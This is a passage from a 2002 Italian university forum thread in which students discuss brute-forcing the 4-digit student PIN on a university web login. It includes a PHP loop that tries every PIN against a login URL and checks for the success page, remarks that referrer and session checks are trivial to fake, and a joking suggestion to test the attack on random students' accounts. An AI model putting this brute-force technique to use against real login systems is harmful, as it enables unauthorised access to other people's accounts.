.dsy:it. Pages (2): « 1 [2]
Show 150 posts per page

.dsy:it. (http://www.dsy.it/forum/)
- Forum De Bell Tolls (http://www.dsy.it/forum/forumdisplay.php?forumid=7)
-- Il PIN degli studenti... (http://www.dsy.it/forum/showthread.php?threadid=1713)


Posted by Mino on 25-11-2002 11:53:

vecchia. :)


un pin di 4 cifre, con un 56k e un 386 lo sgami in una 30ina di secondi se non ci sono politiche di disabilitazione dopo x tentativi oppure un ritardo dopo l'nesimo errore.

__________________
icq: 57553717 - mail: mino@ngi.it - web: www.minux.it - Fattori Arcani


Posted by Lord on 26-11-2002 12:43:

Pardon, ma come funzionerebbe un programma che provi diverse combinazioni? Ovvero: costruire un programmino in c che generi e provi vari numeri sono capace anche io. Come però inviare il numero generato al sito e "leggere" la risposta?

int main (void)
{
int n = 0; bool don't_connect = false;
while (don't_connect==false) { genera_numero(&n); don't_connect = prova_numero(&n);}
genera_danno(); 8-)
}


Posted by URANIO on 26-11-2002 21:42:

Probabilmente la login viene inviato attraverso un comando post o get al server .....quindi basta controllare la form e fare l'invio!
Per controllare basta vedere quello ch ti rimanda il server..almeno penso!:|

__________________
BinarySun
"L'intelligenza è una pianta che va curata continuamente.
Dovreste vedere com'è bello, il mio bonsai."
Rat-man®


Posted by Mino on 26-11-2002 22:26:

isi...

se il form non fa un controllo del referrer basta un fopen in php

PHP:

$trovato = 0;
$pin = 0;

while(!$trovato) {
$url=sprintf("http://www.dominio.it/path/del/cgi?matr=123123&pin=%04d",$pin);
$pin++;

$fp = fopen($url,"r");
if (!$fp) {
echo "squaraus!";
exit(-1);
}

$line = fgets ($fp, 1024);  // ecc ecc

// banalissima regexp che valuta l'output in $line cercando un pezzo di html che appare nella pagina di successo
// se lo trova pone $trovato=1

fclose($fp);
}

echo "Il pin è $pin\n";



altrimenti è altrettanto stupido, basta una fsockopen per aprire una socket su www.dominio.it alla porta 80 e quindi passare i vari parametri ("GET /path/blabla...")...

__________________
icq: 57553717 - mail: mino@ngi.it - web: www.minux.it - Fattori Arcani


Posted by drakend on 26-11-2002 23:48:

Mino ma dopo tre errori l'account viene disabilitato o no?
Il referrer dovrebbe essere l'url da cui si proviene: in questa ipotesi non si può alterare la url di provenienza in modo da farla apparire "legale"?


Posted by Mino on 27-11-2002 12:44:

la disabilitazione dopo x tentativi non so se ci sia. lo spero vivamente...

falsificare referrer e session è una delle cose più banali che si possan fare :)

tempo fa scrissi per me uno scrippettino chiamato "enblue" per inviare sms da blu.it via shell: si loggava sulla homepage, simulava il click su "invia sms", compilava il modulo e controllava i risultati...

__________________
icq: 57553717 - mail: mino@ngi.it - web: www.minux.it - Fattori Arcani


Posted by URANIO on 27-11-2002 22:45:

Secondo me non viene bloccata dopo 3 tentativi!
...se volete provare inserite una matricola a caso e provate (non la mia :D)

__________________
BinarySun
"L'intelligenza è una pianta che va curata continuamente.
Dovreste vedere com'è bello, il mio bonsai."
Rat-man®


Posted by LoneWolf on 28-11-2002 20:43:

Originally posted by URANIO
Secondo me non viene bloccata dopo 3 tentativi!
...se volete provare inserite una matricola a caso e provate (non la mia :D)


Evitate anche il mio...

__________________
"It is totally natural to die or to be killed, rather than just to live without a certain purpose"


All times are GMT. The time now is 22:49. Pages (2): « 1 [2]
Show all 23 posts from this thread on one page

Powered by: vBulletin Version 2.3.1
Copyright © Jelsoft Enterprises Limited 2000 - 2002.